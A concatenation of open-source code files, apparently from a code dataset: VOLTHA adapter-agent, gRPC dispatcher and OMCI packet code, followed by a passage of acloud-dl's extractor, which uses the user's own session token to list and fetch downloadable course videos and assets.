self.event_bus.unsubscribe(self._tx_event_subscriptions[topic])
del self._tx_event_subscriptions[topic]
self._remove_node('/devices', child_device_id)
def _gen_rx_proxy_address_topic(self, proxy_address):
"""Generate unique topic name specific to this proxy address for rx"""
topic = 'rx:' + MessageToJson(proxy_address)
return topic
def _gen_tx_proxy_address_topic(self, proxy_address):
"""Generate unique topic name specific to this proxy address for tx"""
topic = 'tx:' + MessageToJson(proxy_address)
return topic
def register_for_proxied_messages(self, proxy_address):
topic = self._gen_rx_proxy_address_topic(proxy_address)
self._rx_event_subscriptions[topic] = self.event_bus.subscribe(
topic,
lambda t, m: self._receive_proxied_message(proxy_address, m))
def unregister_for_proxied_messages(self, proxy_address):
topic = self._gen_rx_proxy_address_topic(proxy_address)
self.event_bus.unsubscribe(self._rx_event_subscriptions[topic])
del self._rx_event_subscriptions[topic]
def _receive_proxied_message(self, proxy_address, msg):
self.adapter.receive_proxied_message(proxy_address, msg)
def send_proxied_message(self, proxy_address, msg):
topic = self._gen_tx_proxy_address_topic(proxy_address)
self.event_bus.publish(topic, msg)
def _send_proxied_message(self, proxy_address, msg):
self.adapter.send_proxied_message(proxy_address, msg)
def receive_proxied_message(self, proxy_address, msg):
topic = self._gen_rx_proxy_address_topic(proxy_address)
self.event_bus.publish(topic, msg)
def register_for_inter_adapter_messages(self):
self.event_bus.subscribe(self.adapter_name,
lambda t,
m: self.adapter.receive_inter_adapter_message(
m))
def unregister_for_inter_adapter_messages(self):
self.event_bus.unsubscribe(self.adapter_name)
def publish_inter_adapter_message(self, device_id, msg):
# Get the device from the device_id
device = self.get_device(device_id)
assert device is not None
# Publish a message to the adapter that is responsible
# for managing this device
self.event_bus.publish(device.type, msg)
# ~~~~~~~~~~~~~~~~~~ Handling packet-in and packet-out ~~~~~~~~~~~~~~~~~~~~
def send_packet_in(self, logical_device_id, logical_port_no, packet):
self.log.debug('send-packet-in', logical_device_id=logical_device_id,
logical_port_no=logical_port_no, packet=hexify(packet))
if isinstance(packet, Packet):
packet = str(packet)
topic = 'packet-in:' + logical_device_id
self.event_bus.publish(topic, (logical_port_no, packet))
# ~~~~~~~~~~~~~~~~~~~ Handling KPI metric submissions ~~~~~~~~~~~~~~~~~~~~~
def submit_kpis(self, kpi_event_msg):
try:
assert isinstance(kpi_event_msg, KpiEvent)
self.event_bus.publish('kpis', kpi_event_msg)
except Exception as e:
self.log.exception('failed-kpi-submission',
type=type(kpi_event_msg))
# ~~~~~~~~~~~~~~~~~~~ Handle alarm submissions ~~~~~~~~~~~~~~~~~~~~~
def create_alarm(self, id=None, resource_id=None, description=None,
raised_ts=0, changed_ts=0,
type=AlarmEventType.EQUIPMENT,
category=AlarmEventCategory.PON,
severity=AlarmEventSeverity.MINOR,
state=AlarmEventState.RAISED,
context=None):
# Construct the ID if it is not provided
        if id is None:
id = 'voltha.{}.{}'.format(self.adapter_name, resource_id)
return AlarmEvent(
id=id,
resource_id=resource_id,
type=type,
category=category,
severity=severity,
state=state,
description=description,
reported_ts=arrow.utcnow().timestamp,
raised_ts=raised_ts,
changed_ts=changed_ts,
context=context
)
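    # Hypothetical usage (illustrative values): an adapter can raise an alarm
    # against a device with
    #   alarm = adapter_agent.create_alarm(resource_id=device.id,
    #                                      description='olt.los',
    #                                      severity=AlarmEventSeverity.MAJOR)
    #   adapter_agent.submit_alarm(device.id, alarm)
    # submit_alarm() runs filter_alarm() first and only publishes unfiltered
    # alarms on the 'alarms' event bus topic.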
def filter_alarm(self, device_id, alarm_event):
alarm_filters = self.root_proxy.get('/alarm_filters')
rule_values = {
'id': alarm_event.id,
'type': AlarmEventType.AlarmEventType.Name(alarm_event.type),
'category': AlarmEventCategory.AlarmEventCategory.Name(
alarm_event.category),
'severity': AlarmEventSeverity.AlarmEventSeverity.Name(
alarm_event.severity),
'resource_id': alarm_event.resource_id,
'device_id': device_id
}
for alarm_filter in alarm_filters:
if alarm_filter.rules:
exclude = True
for rule in alarm_filter.rules:
self.log.debug("compare-alarm-event",
key=AlarmFilterRuleKey.AlarmFilterRuleKey.Name(
rule.key),
actual=rule_values[
AlarmFilterRuleKey.AlarmFilterRuleKey.Name(
rule.key)].lower(),
expected=rule.value.lower())
exclude = exclude and \
(rule_values[
AlarmFilterRuleKey.AlarmFilterRuleKey.Name(
rule.key)].lower() == rule.value.lower())
if not exclude:
break
if exclude:
self.log.info("filtered-alarm-event", alarm=alarm_event)
return True
return False
def submit_alarm(self, device_id, alarm_event_msg):
try:
assert isinstance(alarm_event_msg, AlarmEvent)
if not self.filter_alarm(device_id, alarm_event_msg):
self.event_bus.publish('alarms', alarm_event_msg)
except Exception as e:
self.log.exception('failed-alarm-submission',
type=type(alarm_event_msg))
# ~~~~~~~~~~~~~~~~~~~ Handle ONU detect ~~~~~~~~~~~~~~~~~~~~~
def _gen_onu_detect_proxy_address_topic(self, device_id):
"""Generate unique topic name specific to this device id for onu detect"""
topic = str('onu_detect:{}'.format(device_id))
return topic
def register_for_onu_detect_state(self, device_id):
topic = self._gen_onu_detect_proxy_address_topic(device_id)
self._onu_detect_event_subscriptions[topic] = self.event_bus.subscribe(
topic,
lambda t, m: self._forward_onu_detect_state(device_id, m))
def unregister_for_onu_detect_state(self, device_id):
topic = self._gen_onu_detect_proxy_address_topic(device_id)
self.event_bus.unsubscribe(self._onu_detect_event_subscriptions[topic])
del self._onu_detect_event_subscriptions[topic]
def _forward_onu_detect_state(self, device_id, state):
self.adapter.receive_onu_detect_state(device_id, state)
def forward_onu_detect_state(self, device_id, state):
topic = self._gen_onu_detect_proxy_address_topic(device_id)
self.event_bus.publish(topic, state)
```
#### File: voltha/core/dispatcher.py
```python
import structlog
from twisted.internet.defer import inlineCallbacks, returnValue
from voltha.protos.voltha_pb2 import VolthaLocalServiceStub
from voltha.registry import registry
from twisted.internet import reactor
import grpc
from grpc import StatusCode
from grpc._channel import _Rendezvous
from common.utils.id_generation import get_core_id_from_device_id, \
is_broadcast_core_id
log = structlog.get_logger()
class DispatchError(object):
def __init__(self, error_code):
self.error_code = error_code
class Dispatcher(object):
def __init__(self, core, instance_id, core_store_id, grpc_port):
self.core = core
self.instance_id = instance_id
self.core_store_id = core_store_id
self.grpc_port = grpc_port
self.local_handler = None
self.peers_map = dict()
self.grpc_conn_map = {}
def start(self):
log.debug('starting')
self.local_handler = self.core.get_local_handler()
reactor.callLater(0, self._start_tracking_peers)
log.info('started')
return self
def stop(self):
log.debug('stopping')
log.info('stopped')
@inlineCallbacks
def dispatch(self,
method_name,
request,
context,
core_id=None,
id=None,
broadcast=False):
"""
Called whenever a global request is received from the NBI. The
        request will be dispatched as follows:
1) to a specific voltha Instance if the core_id is specified
2) to the local Voltha Instance if the request specifies an ID that
matches the core id of the local Voltha instance
3) to a remote Voltha Instance if the request specifies an ID that
matches the core id of that voltha instance
4) to all Voltha Instances if it's a broadcast request,
e.g. getDevices, i.e. broadcast=True. The id may or may not be
None. In this case, the results will be returned as a list of
responses back to the global handler
5) to the local voltha instance if id=None and broadcast=False.
This occurs in cases where any Voltha instance will return the same
output, e.g. getAdapters()
:param method_name: rpc name
:param id: the id in the request, if present.
:param request: the input parameters
:param context: grpc context
:return: the response of that dispatching request
"""
log.info('start',
_method_name=method_name,
id=id,
request=request)
core_id_from_request_id = None
if id:
try:
core_id_from_request_id = get_core_id_from_device_id(id)
except Exception, e:
log.warning('invalid-id', request=request, id=id)
returnValue(DispatchError(StatusCode.NOT_FOUND))
try:
# Broadcast request if set
if broadcast:
# broadcast to all instances (including locally)
res = yield self._broadcast_request(method_name,
request,
context)
returnValue(res)
# Local Dispatch
elif (core_id and core_id == self.core_store_id) or (not id) or \
(core_id_from_request_id and (
(core_id_from_request_id == self.core_store_id) or
(is_broadcast_core_id(id))
)
):
returnValue(self._local_dispatch(self.core_store_id,
method_name,
request,
context))
# Peer Dispatch
elif core_id_from_request_id:
res = yield self._dispatch_to_peer(core_id_from_request_id,
method_name,
request,
context)
returnValue(res)
else:
log.warning('invalid-request', request=request, id=id,
core_id=core_id, broadcast=broadcast)
returnValue(DispatchError(StatusCode.INVALID_ARGUMENT))
except Exception as e:
log.exception('remote-dispatch-exception', e=e)
returnValue(DispatchError(StatusCode.UNKNOWN))
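    # Illustrative routing summary for dispatch() (the device id below is
    # hypothetical):
    #   dispatch('GetDevice', request, context, id=device_id)
    # extracts the core id embedded in device_id; if it matches this core's
    # core_store_id the call is handled locally, otherwise it is forwarded to
    # the owning peer over gRPC. broadcast=True instead fans the call out to
    # every known core and merges the responses into a single result.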
def get_core_id_from_instance_id(self, instance_id):
"""
:param instance_id: instance name
:return: core id of that instance
"""
if instance_id == self.instance_id:
return self.core_store_id
for id, instance in self.peers_map.iteritems():
if instance['id'] == instance_id:
return id
def get_cluster_instances(self):
result = []
result.append(self.instance_id)
for id, instance in self.peers_map.iteritems():
result.append(instance['id'])
return result
def instance_id_by_logical_device_id(self, logical_device_id):
log.warning('temp-mapping-logical-device-id')
        # TODO no true dispatching yet, we blindly map everything to self
return self.instance_id
def instance_id_by_device_id(self, device_id):
log.warning('temp-mapping-logical-device-id')
        # TODO no true dispatching yet, we blindly map everything to self
return self.instance_id
@inlineCallbacks
def _broadcast_request(self, method_name, request, context):
# First get local result
result = self._local_dispatch(self.core_store_id,
method_name,
request,
context)
# Then get peers results
log.info('maps', peers=self.peers_map, grpc=self.grpc_conn_map)
current_responses = [result]
for core_id in self.peers_map:
if core_id == self.core_store_id:
continue # already processed
# As a safeguard, check whether the core_id is in the grpc map
if core_id not in self.grpc_conn_map:
log.warn('no-grpc-peer-connection', core=core_id)
elif self.peers_map[core_id] and self.grpc_conn_map[core_id]:
res = yield self._dispatch_to_peer(core_id,
method_name,
request,
context)
if isinstance(res, DispatchError):
log.warning('ignoring-peer',
core_id=core_id,
error_code=res.error_code)
elif res not in current_responses:
result.MergeFrom(res)
current_responses.append(res)
returnValue(result)
def _local_dispatch(self, core_id, method_name, request, context):
log.debug('local-dispatch', core_id=core_id)
method = getattr(self.local_handler, method_name)
res = method(request, context=context)
log.debug('local-dispatch-result', res=res, context=context)
return res
@inlineCallbacks
def _start_tracking_peers(self):
try:
while True:
peers_map = yield registry('coordinator').recv_peers_map()
log.info('peers-map-changed', peers_map=peers_map)
yield self.update_grpc_client_map(peers_map)
self.peers_map = peers_map
except Exception, e:
log.exception('exception', e=e)
@inlineCallbacks
def update_grpc_client_map(self, peers_map):
try:
# 1. Get the list of connection to open and to close
to_open = dict()
to_close = set()
for id, instance in peers_map.iteritems():
# Check for no change
if id in self.peers_map and self.peers_map[id] == instance:
continue
if id not in self.peers_map:
if instance:
to_open[id] = instance['host']
elif instance:
to_open[id] = instance['host']
if self.peers_map[id]:
to_close.add(id)
else:
if self.peers_map[id]:
to_close.add(id)
# Close connections that are no longer referenced
old_ids = set(self.peers_map.keys()) - set(peers_map.keys())
for id in old_ids:
if self.peers_map[id]:
to_close.add(id)
# 2. Refresh the grpc connections
yield self._refresh_grpc_connections(to_open, to_close)
except Exception, e:
log.exception('exception', e=e)
@inlineCallbacks
def _refresh_grpc_connections(self, to_open, to_close):
try:
log.info('grpc-channel-refresh', to_open=to_open,
to_close=to_close)
# Close the unused connection
for id in to_close:
if self.grpc_conn_map[id]:
# clear connection
self._disconnect_from_peer(id)
# Open the new connections
for id, host in to_open.iteritems():
if id in self.grpc_conn_map and self.grpc_conn_map[id]:
# clear connection
self._disconnect_from_peer(id)
if host:
self.grpc_conn_map[id] = \
yield self._connect_to_peer(host, self.grpc_port)
except Exception, e:
log.exception('exception', e=e)
@inlineCallbacks
def _connect_to_peer(self, host, port):
try:
channel = yield grpc.insecure_channel('{}:{}'.format(host, port))
log.info('grpc-channel-created-with-peer', peer=host)
returnValue(channel)
except Exception, e:
log.exception('exception', e=e)
def _disconnect_from_peer(self, peer_id):
try:
if self.grpc_conn_map[peer_id]:
# Let garbage collection clear the connect - no API exist to
# close the connection
# yield self.grpc_conn_map[peer_id].close()
self.grpc_conn_map[peer_id] = None
log.info('grpc-channel-closed-with-peer', peer_id=peer_id)
except Exception, e:
log.exception('exception', e=e)
finally:
self.grpc_conn_map.pop(peer_id)
@inlineCallbacks
def _reconnect_to_peer(self, peer_id):
try:
# First disconnect
yield self._disconnect_from_peer(peer_id)
# Then reconnect
peer_instance = self.peers_map.get(peer_id, None)
if peer_instance:
self.grpc_conn_map[peer_id] = \
yield self._connect_to_peer(peer_instance['host'],
self.grpc_port)
log.info('reconnected-to-peer', peer_id=peer_id)
returnValue(True)
else:
log.info('peer-unavailable', peer_id=peer_id)
except Exception, e:
log.exception('exception', e=e)
returnValue(False)
@inlineCallbacks
def _dispatch_to_peer(self,
core_id,
method_name,
request,
context,
retry=0):
"""
Invoke a gRPC call to the remote server and return the response.
:param core_id: The voltha instance where this request needs to be sent
:param method_name: The method name inside the service stub
:param request: The request protobuf message
        :param context: grpc context
:param retry: on failure, the number of times to retry.
:return: The response as a protobuf message
"""
log.debug('peer-dispatch',
core_id=core_id,
_method_name=method_name,
request=request)
if core_id not in self.peers_map or not self.peers_map[core_id]:
log.exception('non-existent-core-id', core_id=core_id,
peers_map=self.peers_map)
return
try:
# Always request from the local service when making request to peer
# Add a long timeout of 15 seconds to balance between:
            # (1) a query for a large amount of data from a peer
# (2) an error where the peer is not responding and the
# request keeps waiting without getting a grpc
# rendez-vous exception.
stub = VolthaLocalServiceStub
method = getattr(stub(self.grpc_conn_map[core_id]), method_name)
response, rendezvous = yield method.with_call(request,
timeout=15,
metadata=context.invocation_metadata())
log.debug('peer-response',
core_id=core_id,
response=response,
rendezvous_metadata=rendezvous.trailing_metadata())
# TODO: Should we return the metadata as well
returnValue(response)
except grpc._channel._Rendezvous, e:
code = e.code()
if code == grpc.StatusCode.UNAVAILABLE:
# Try to reconnect
status = yield self._reconnect_to_peer(core_id)
if status and retry > 0:
response = yield self._dispatch_to_peer(core_id,
method_name,
request,
context,
retry=retry - 1)
returnValue(response)
elif code in (
grpc.StatusCode.NOT_FOUND,
grpc.StatusCode.INVALID_ARGUMENT,
grpc.StatusCode.ALREADY_EXISTS,
grpc.StatusCode.UNAUTHENTICATED,
grpc.StatusCode.PERMISSION_DENIED):
pass # don't log error, these occur naturally
else:
log.exception('error-invoke', e=e)
log.warning('error-from-peer', code=code)
returnValue(DispatchError(code))
```
#### File: extensions/omci/omci_frame.py
```python
from scapy.fields import ByteField, PacketField, IntField
from scapy.fields import ShortField, ConditionalField
from scapy.packet import Packet
from voltha.extensions.omci.omci_defs import FixedLenField
from voltha.extensions.omci.omci_messages import OmciCreate, OmciDelete, \
OmciDeleteResponse, OmciSet, OmciSetResponse, OmciGet, OmciGetResponse, \
OmciGetAllAlarms, OmciGetAllAlarmsResponse, OmciGetAllAlarmsNext, \
OmciMibResetResponse, OmciMibReset, OmciMibUploadNextResponse, \
OmciMibUploadNext, OmciMibUploadResponse, OmciMibUpload, \
OmciGetAllAlarmsNextResponse, OmciAttributeValueChange, \
OmciTestResult, OmciAlarmNotification, \
OmciReboot, OmciRebootResponse
from voltha.extensions.omci.omci_messages import OmciCreateResponse
class OmciFrame(Packet):
name = "OmciFrame"
fields_desc = [
ShortField("transaction_id", 0),
ByteField("message_type", None),
ByteField("omci", 0x0a),
ConditionalField(FixedLenField(
PacketField("omci_message", None, OmciCreate), align=36),
lambda pkt: pkt.message_type == OmciCreate.message_id),
ConditionalField(FixedLenField(
PacketField("omci_message", None, OmciCreateResponse), align=36),
lambda pkt: pkt.message_type == OmciCreateResponse.message_id),
ConditionalField(FixedLenField(
PacketField("omci_message", None, OmciDelete), align=36),
lambda pkt: pkt.message_type == OmciDelete.message_id),
ConditionalField(FixedLenField(
PacketField("omci_message", None, OmciDeleteResponse), align=36),
lambda pkt: pkt.message_type == OmciDeleteResponse.message_id),
ConditionalField(FixedLenField(
PacketField("omci_message", None, OmciSet), align=36),
lambda pkt: pkt.message_type == OmciSet.message_id),
ConditionalField(FixedLenField(
PacketField("omci_message", None, OmciSetResponse), align=36),
lambda pkt: pkt.message_type == OmciSetResponse.message_id),
ConditionalField(FixedLenField(
PacketField("omci_message", None, OmciGet), align=36),
lambda pkt: pkt.message_type == OmciGet.message_id),
ConditionalField(FixedLenField(
PacketField("omci_message", None, OmciGetResponse), align=36),
lambda pkt: pkt.message_type == OmciGetResponse.message_id),
ConditionalField(FixedLenField(
PacketField("omci_message", None, OmciGetAllAlarms), align=36),
lambda pkt: pkt.message_type == OmciGetAllAlarms.message_id),
ConditionalField(FixedLenField(
PacketField(
"omci_message", None, OmciGetAllAlarmsResponse), align=36),
lambda pkt:
pkt.message_type == OmciGetAllAlarmsResponse.message_id),
ConditionalField(FixedLenField(
PacketField("omci_message", None, OmciGetAllAlarmsNext), align=36),
lambda pkt: pkt.message_type == OmciGetAllAlarmsNext.message_id),
ConditionalField(FixedLenField(
PacketField(
"omci_message", None, OmciGetAllAlarmsNextResponse), align=36),
lambda pkt:
pkt.message_type == OmciGetAllAlarmsNextResponse.message_id),
ConditionalField(FixedLenField(
PacketField("omci_message", None, OmciMibUpload), align=36),
lambda pkt: pkt.message_type == OmciMibUpload.message_id),
ConditionalField(FixedLenField(
PacketField("omci_message", None, OmciMibUploadResponse), align=36),
lambda pkt: pkt.message_type == OmciMibUploadResponse.message_id),
ConditionalField(FixedLenField(
PacketField("omci_message", None, OmciMibUploadNext), align=36),
lambda pkt:
pkt.message_type == OmciMibUploadNext.message_id),
ConditionalField(FixedLenField(
PacketField("omci_message", None, OmciMibUploadNextResponse), align=36),
lambda pkt: pkt.message_type == OmciMibUploadNextResponse.message_id),
ConditionalField(FixedLenField(
PacketField("omci_message", None, OmciMibReset), align=36),
lambda pkt: pkt.message_type == OmciMibReset.message_id),
ConditionalField(FixedLenField(
PacketField("omci_message", None, OmciMibResetResponse), align=36),
lambda pkt: pkt.message_type == OmciMibResetResponse.message_id),
ConditionalField(FixedLenField(
PacketField("omci_message", None, OmciAlarmNotification), align=36),
lambda pkt: pkt.message_type == OmciAlarmNotification.message_id),
ConditionalField(FixedLenField(
PacketField("omci_message", None, OmciAttributeValueChange), align=36),
lambda pkt: pkt.message_type == OmciAttributeValueChange.message_id),
ConditionalField(FixedLenField(
PacketField("omci_message", None, OmciTestResult), align=36),
lambda pkt: pkt.message_type == OmciTestResult.message_id),
ConditionalField(FixedLenField(
PacketField("omci_message", None, OmciReboot), align=36),
lambda pkt: pkt.message_type == OmciReboot.message_id),
ConditionalField(FixedLenField(
PacketField("omci_message", None, OmciRebootResponse), align=36),
lambda pkt: pkt.message_type == OmciRebootResponse.message_id),
# TODO add entries for remaining OMCI message types
IntField("omci_trailer", 0x00000028)
]
# We needed to patch the do_dissect(...) method of Packet, because
# it wiped out already dissected conditional fields with None if they
# referred to the same field name. We marked the only new line of code
# with "Extra condition added".
def do_dissect(self, s):
raw = s
self.raw_packet_cache_fields = {}
for f in self.fields_desc:
if not s:
break
s, fval = f.getfield(self, s)
# We need to track fields with mutable values to discard
# .raw_packet_cache when needed.
if f.islist or f.holds_packets:
self.raw_packet_cache_fields[f.name] = f.do_copy(fval)
# Extra condition added
if fval is not None or f.name not in self.fields:
self.fields[f.name] = fval
assert(raw.endswith(s))
self.raw_packet_cache = raw[:-len(s)] if s else raw
self.explicit = 1
return s
``` |
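OmciFrame above picks which `omci_message` payload to build or parse purely from the `message_type` byte via `ConditionalField`. A self-contained toy showing the same dispatch idea with invented field names (not the real OMCI message classes):
```python
from scapy.packet import Packet
from scapy.fields import ByteField, ShortField, IntField, ConditionalField

class ToyFrame(Packet):
    name = "ToyFrame"
    fields_desc = [
        ByteField("message_type", 0),
        # exactly one payload field is present, selected by message_type
        ConditionalField(ShortField("short_payload", 0),
                         lambda pkt: pkt.message_type == 1),
        ConditionalField(IntField("int_payload", 0),
                         lambda pkt: pkt.message_type == 2),
    ]

raw = bytes(ToyFrame(message_type=2, int_payload=0xdeadbeef))
decoded = ToyFrame(raw)
print(decoded.message_type, hex(decoded.int_payload))  # -> 2 0xdeadbeef
```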
{
"source": "jonohein/acloud-dl",
"score": 2
} |
#### File: acloud-dl/acloud/_extract.py
```python
import os
import re
import sys
import json
from pprint import pprint
from ._auth import CloudGuruAuth
from ._compat import (
re,
time,
pyver,
encoding,
conn_error,
PUBLIC_GRAPHQL_URL,
PROTECTED_GRAPHQL_URL,
GRAPH_QUERY_COURSES,
GRAPH_QUERY_COURSE_INFO,
GRAPH_QUERY_DOWNLOAD_LINKS,
)
from ._sanitize import (
slugify,
sanitize,
SLUG_OK
)
from ._colorized import *
from ._progress import ProgressBar
class CloudGuru(ProgressBar):
def __init__(self):
self._session = ''
self._cookies = ''
super(CloudGuru, self).__init__()
def _clean(self, text):
ok = re.compile(r'[^\\/:*?"<>|]')
text = "".join(x if ok.match(x) else "_" for x in text)
text = (text.lstrip('0123456789.- ')).rstrip('. ')
return text
def _sanitize(self, unsafetext):
text = slugify(unsafetext, lower=False, spaces=True, ok=SLUG_OK + '()._-')
return self._clean(text)
def _extract_cookie_string(self, raw_cookies):
try:
mobj = re.search(r'(?is)(Authorization:\s*Bearer\s*(?P<access_token>(.+?)))(\"\s|\s)', raw_cookies)
if not mobj:
mobj = re.search(r'(?i)(?:auth0_token=(?P<access_token>[a-zA-Z0-9_.-]+))', raw_cookies)
access_token = mobj.group('access_token')
except:
            sys.stdout.write(fc + sd + "[" + fr + sb + "-" + fc + sd + "] : " + fr + sb + "Cookie error: Request Headers are required.\n")
            sys.stdout.write(fc + sd + "[" + fm + sb + "i" + fc + sd + "] : " + fg + sb + "Copy the Request Headers of a single request to a file while you are logged in.\n")
sys.exit(0)
return {'access_token' : access_token}
def _login(self, cookies=''):
if cookies:
auth = CloudGuruAuth()
self._cookies = self._extract_cookie_string(raw_cookies=cookies)
access_token = self._cookies.get('access_token')
time.sleep(3)
self._session = auth.authenticate(access_token=access_token)
if self._session is not None:
return {'login' : 'successful'}
else:
return {'login' : 'failed'}
def _logout(self):
return self._session.terminate()
def _extract_accessible_courses(self):
try:
response = self._session._post(PUBLIC_GRAPHQL_URL, GRAPH_QUERY_COURSES)
except conn_error as e:
sys.stdout.write(fc + sd + "[" + fr + sb + "-" + fc + sd + "] : " + fr + sb + "Connection error : make sure your internet connection is working.\n")
time.sleep(0.8)
sys.exit(0)
else:
courses = response.json().get('data')
if courses:
                accessible_courses = courses.get('getAccessibleCourses')
                if not accessible_courses:
                    sys.stdout.write(fc + sd + "[" + fr + sb + "-" + fc + sd + "] : " + fr + sb + "Zero accessible courses: no courses found in your accessible courses.\n")
                    sys.stdout.write(fc + sd + "[" + fm + sb + "i" + fc + sd + "] : " + fg + sb + "Click 'START THIS COURSE' button to be able to get listed for download..\n")
                    sys.stdout.write(fc + sd + "[" + fm + sb + "i" + fc + sd + "] : " + fg + sb + "OR follow --> (https://github.com/r0oth3x49/acloud-dl#usage) for proper help..\n")
                    sys.exit(0)
                courses = accessible_courses
for course in courses:
title_clean = self._clean(course.get("title"))
if title_clean:
course.update({"title": title_clean})
return courses
if not courses:
if response.headers.get('x-amzn-ErrorType'):
sys.stdout.write(fc + sd + "[" + fr + sb + "-" + fc + sd + "] : " + fr + sb + "Authorization error : it seems your authorization token is expired.\n")
sys.stdout.write(fc + sd + "[" + fm + sb + "i" + fc + sd + "] : " + fg + sb + "Login again & copy Request headers for a single request to file..\n")
sys.exit(0)
def _extract_assets(self, assets):
_temp = []
if assets and isinstance(assets, list):
for entry in assets:
filename = self._sanitize(entry.get('title'))
url = entry.get('url')
bucket = entry.get('bucket')
key = entry.get('key')
regex = r"(?i)(?:^.*\.(?P<extension>jpg|gif|doc|pdf|zip|docx|ppt|pptx|pptm|txt|py|c|json|md|html|htm|sh|batch|bat))$"
if url:
match = re.match(regex, url)
if match:
extension = match.group('extension')
_temp.append({
'url' : url,
'type' : 'file' if 'github' not in url else 'external_link',
'filename' : filename.rsplit('.', 1)[0] if '.' in filename else filename,
'extension' : extension,
})
if not match:
_temp.append({
'url' : url,
'type' : 'external_link',
'filename' : filename.rsplit('.', 1)[0] if '.' in filename else filename,
'extension' : 'txt',
})
if not url:
query = '''{"bucket": "%s","filePath": "%s"}''' % (bucket, key)
query = GRAPH_QUERY_DOWNLOAD_LINKS % (query)
try:
data = self._session._post(PROTECTED_GRAPHQL_URL, query)
except conn_error as e:
pass
else:
response = data.json().get('data')
if response:
url = response['getRestrictedFiles'].get('urls')[0]
match = re.match(regex, url)
if match:
extension = match.group('extension')
if not match:
extension = filename.rsplit('.', 1)[-1] if '.' in url else 'zip'
_temp.append({
'url' : url,
'type' : 'file',
'filename' : filename.rsplit('.', 1)[0] if '.' in filename else filename,
'extension' : extension,
})
if not response:
if data.headers.get('x-amzn-ErrorType'):
sys.stdout.write(fc + sd + "[" + fr + sb + "-" + fc + sd + "] : " + fr + sb + "Authorization error : it seems your authorization token is expired.\n")
sys.stdout.write(fc + sd + "[" + fm + sb + "i" + fc + sd + "] : " + fg + sb + "Login again & copy Request headers for a single request to file..\n")
sys.exit(0)
return _temp
def _extract_sources(self, sources):
_temp = []
for entry in sources:
resolution = entry.get('description')
            if resolution in ('hls', 'webm-720p', 'web-preset'):
continue
if resolution:
source_type = entry.get('type').replace('video/', '')
url = entry.get('key')
bucket = entry.get('bucket')
filesize = entry.get('filesize') or 0
query = '''{"bucket": "%s","filePath": "%s"}''' % (bucket, url)
if resolution == "2160p":
height, width = 2160, 3840
elif resolution == "1440p":
height, width = 1440, 2560
elif resolution == "1080p":
height, width = 1080, 1920
elif resolution == "720p":
height, width = 720, 1280
elif resolution == "480p":
height, width = 480, 854
_temp.append({
'quality' : resolution,
'type' : 'video',
'extension' : source_type,
'path' : url,
'url' : query,
'height' : height,
'width' : width,
'size' : filesize
})
if not resolution:
source_type = entry.get('type').replace('video/', '')
url = entry.get('key')
bucket = entry.get('bucket')
filesize = entry.get('filesize') or 0
query = '''{"bucket": "%s","filePath": "%s"}''' % (bucket, url)
_temp.append({
'quality' : resolution,
'type' : 'video',
'extension' : source_type,
'path' : url,
'url' : query,
'height' : 720,
'width' : 1280,
'size' : filesize
})
return _temp
def _extract_course_information(self, course):
_temp = []
chapters = course.get('chapters')
lectures = [l.get('lectures') for l in chapters]
for lecture in lectures:
sources = [s.get('sources') for s in lecture]
for entry in sources:
query = [e.get('url') for e in entry]
for _str in query:
_temp.append(_str)
files = ','.join(_temp)
query = GRAPH_QUERY_DOWNLOAD_LINKS % (files)
try:
response = self._session._post(PROTECTED_GRAPHQL_URL, query)
except conn_error as e:
sys.stdout.write(fc + sd + "[" + fr + sb + "-" + fc + sd + "] : " + fr + sb + "Connection error : make sure your internet connection is working.\n")
time.sleep(0.8)
sys.exit(0)
else:
data = response.json().get('data')
if data:
data = data['getRestrictedFiles'].get('urls')
chapters = course.get('chapters')
for entry in chapters:
lectures = entry.get('lectures')
for entry in lectures:
text = '\r' + fc + sd + "[" + fm + sb + "*" + fc + sd + "] : " + fg + sb + "Downloading course information .. "
self._spinner(text)
sources = entry.get('sources')
for entry in sources:
path = entry.get('path')
for url in data:
if path in url:
entry.update({'url' : url})
if not data:
if response.headers.get('x-amzn-ErrorType'):
sys.stdout.write(fc + sd + "[" + fr + sb + "-" + fc + sd + "] : " + fr + sb + "Authorization error : it seems your authorization token is expired.\n")
sys.stdout.write(fc + sd + "[" + fm + sb + "i" + fc + sd + "] : " + fg + sb + "Login again & copy Request headers for a single request to file..\n")
sys.exit(0)
return course
def _extract_lectures(self, lectures):
_temp = []
for entry in lectures:
lecture_title = self._sanitize(entry.get('title'))
lecture_index = int(entry.get('sequence')) + 1
lecture_id = entry.get('componentIdentifier')
content_type = entry['content'].get('type')
lecture = "{0:03d} {1!s}".format(lecture_index, lecture_title)
assets = entry.get('notes')
assets = self._extract_assets(assets)
if content_type == 'video':
sources = entry['content'].get('videosources')
duration = entry['content'].get('duration')
extension = entry['content'].get('type')
sources = self._extract_sources(sources)
subtitle_url = None
for s in sources:
cid = s.get("url")
if cid:
cid = cid.rsplit("/", 1)[-1]
cid = re.search(r"[a-zA-Z0-9]{8}\-[a-zA-Z0-9]{4}\-[a-zA-Z0-9]{4}\-[a-zA-Z0-9]{4}\-[a-zA-Z0-9]{12}", cid)
if cid:
subtitle_url = f"https://acloudguru-subtitles-production.s3.amazonaws.com/{cid.group()}.vtt"
break
if lecture not in _temp:
_temp.append({
'lecture_title' : lecture,
'lecture_id' : lecture_id,
'lecture_index' : lecture_index,
'subtitle_url': subtitle_url,
'duration' : duration,
'extension' : extension,
'sources' : sources,
'assets' : assets,
'sources_count' : len(sources),
'assets_count' : len(assets)
})
return _temp
def _real_extract(self, course_id):
acloud = {}
query = GRAPH_QUERY_COURSE_INFO % (course_id)
try:
response = self._session._post(PUBLIC_GRAPHQL_URL, query)
except conn_error as e:
sys.stdout.write(fc + sd + "[" + fr + sb + "-" + fc + sd + "] : " + fr + sb + "Connection error : make sure your internet connection is working.\n")
time.sleep(0.8)
sys.exit(0)
else:
course = response.json().get('data')
if course:
course = course['getCourses'][0]
course_url = course.get('url')
course_title = self._sanitize(course.get('title'))
course_id = course.get('uniqueid')
chapters = course.get('sections')
acloud['course_id'] = course_id
acloud['course_url'] = course_url
acloud['course_title'] = course_title
acloud['total_chapters'] = len(chapters)
acloud['total_lectures'] = sum([len(chapter.get('components', [])) for chapter in chapters])
acloud['chapters'] = []
for entry in chapters:
chapter_title = self._sanitize(entry.get('title'))
chapter_id = entry.get('sectionIdentifier')
chapter_url = entry.get('url')
chapter_index = int(entry.get('sequence')) + 1
lectures_count = len(entry.get('components'))
lectures = entry.get('components')
chapter = "{0:02d} {1!s}".format(chapter_index, chapter_title)
acloud['chapters'].append({
'chapter_title' : chapter,
'chapter_id' : chapter_id,
'chapter_index' : chapter_index,
'lectures_count' : lectures_count,
